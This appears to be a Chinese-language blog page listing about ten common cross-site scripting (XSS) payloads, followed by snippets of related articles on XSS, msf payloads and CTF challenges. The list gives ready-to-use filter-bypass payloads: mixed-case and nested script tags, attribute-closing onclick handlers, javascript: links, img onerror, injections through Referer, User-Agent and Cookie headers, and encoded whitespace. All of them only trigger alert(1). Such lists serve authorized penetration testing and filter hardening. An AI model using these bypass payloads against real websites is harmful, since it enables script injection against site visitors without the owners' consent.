XSS常用Payload

1.普通的

<ScRipt>alert(1)</ScRipt>
1"><ScRipt>alert(1)</ScRipt>
2.绕过htmlspecialchars方法，先闭合输入，再使用事件来绕过
' onclick ='javascript:alert(1)'//
" onclick ='javascript:alert(1)'//

3.<> script onclick被过滤，用a标签绕过
"></input><a href='javascript:alert(1)'>asd</a>//

4.重写绕过
1"><ScscriptRipt>alert(1)</ScscriptRipt>

5.Unicode编码绕过
javascript:alert(1)

6.使用type=text来显示被隐藏的标签，再用事件
&t_sort=" type='text' οnclick='javascript:alert(1)'>//

7.referer UserAgent Cookie等地方也可以进行xss测试
referer:" type='text' οnclick='javascript:alert(1)'>//

8.图片

<img src=xxxx οnerrοr=alert(1)>'

9.用这些字符来测试哪些被过滤了
“ ‘ <> script onerror onclick
10.空格用回车编码代替
<a%0D%0Aοnclick='alert(1)'>

XSS常用Payload相关推荐

360在线网站安全检测，web安全测试AppScan扫描工具，XSS常用的攻击手法
360在线网站安全检测,web安全测试AppScan扫描工具,XSS常用的攻击手法如何做好网站的安全性测试 360网站安全检测 - 在线安全检测,网站漏洞修复,网站后门检测 http://websc ...
msf常用payload
msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用.生成payload使用的工具是MSFVenom ...
php伪协议xss,XSS漏洞学习
XSS漏洞的原理 XSS漏洞是发生在目标网站中目标用户的浏览层面上,当用户浏览器渲染整个HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就会发生. XSS漏洞的危害获取用户或者管理员的 ...
payload的使常用xss_Sony某个深度子域上的XSS
大家好!这是我第一次写关于漏洞悬赏的文章.我从2019年7月22日开始加入大量漏洞悬赏项目,想和大家分享我发现的所有漏洞. 关于项目的选择方面,我基本都选择范围较大的目标,因为我不太关心奖励高低,只是 ...
漏洞进阶之——XSS万能超级无敌全通杀payload
XSS万能超级无敌全通杀payload XSS 漏洞简介 payload--on,js事件 payload--标签 payload--过狗过墙思路本人常用payload分享 ------------ ...
利用xss平台的payload输入留言即可获得flag
title: CTFHUB------XSS date: 2021-06-23 10:48:44 top:利用xss平台的payload输入留言即可获得flag categories: CTFHUB刷 ...
ajax在Xss中的利用,XSS高级利用
点击阅读利用 xss 的 javascript 劫持一个 xss 漏洞示例页面 1 2 3 4 5 6 7 8 9 10 $xss = @$_GET['xss']; if($xss!==null) ...
OWASP出品：Xenotix XSS漏洞测试框架及简单使用
OWASP Xenotix XSS Exploit Framework是一个高效的跨站脚本漏洞(XSS)检测和攻击测试框架.它通过特有的三大浏览器引擎(包括Trident, WebKit和Gecko) ...
对未标记为可安全执行的脚本_三、??XSS跨站脚本攻击
跨站脚本攻击(Cross Site Scripting),缩写为XSS.恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意 ...

XSS常用Payload

XSS常用Payload相关推荐

最新文章

热门文章